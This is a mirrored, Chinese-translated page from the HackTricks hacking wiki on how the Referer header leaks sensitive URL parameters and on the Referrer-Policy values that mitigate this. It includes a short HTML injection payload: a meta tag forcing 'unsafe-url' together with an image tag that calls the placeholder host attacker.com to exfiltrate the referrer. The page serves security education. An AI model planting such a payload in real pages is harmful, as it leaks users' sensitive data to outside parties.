mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
4.1 KiB
4.1 KiB
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一个网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品The PEASS Family
-
加入 💬 Discord群组 或 电报群组 或 关注我在Twitter上的🐦@carlospolopm。
-
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
引荐者头部和策略
引荐者是浏览器用来指示之前访问的页面的头部。
泄露的敏感信息
如果在网页中的某个位置存在任何敏感信息,例如GET请求参数,如果页面包含指向外部资源的链接,或者攻击者能够使/建议(社交工程)用户访问由攻击者控制的URL。攻击者可能能够在最新的GET请求中窃取敏感信息。
缓解措施
您可以让浏览器遵循一个引荐者策略,这可以避免将敏感信息发送给其他Web应用程序:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
对策
您可以使用HTML元标签覆盖此规则(攻击者需要利用HTML注入):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
防御
永远不要将任何敏感数据放在URL的GET参数或路径中。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一家网络安全公司工作吗?想要在HackTricks中看到你的公司广告吗?或者你想要访问PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品——The PEASS Family
-
加入💬 Discord群组或电报群组,或者关注我在Twitter上的🐦@carlospolopm。
-
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。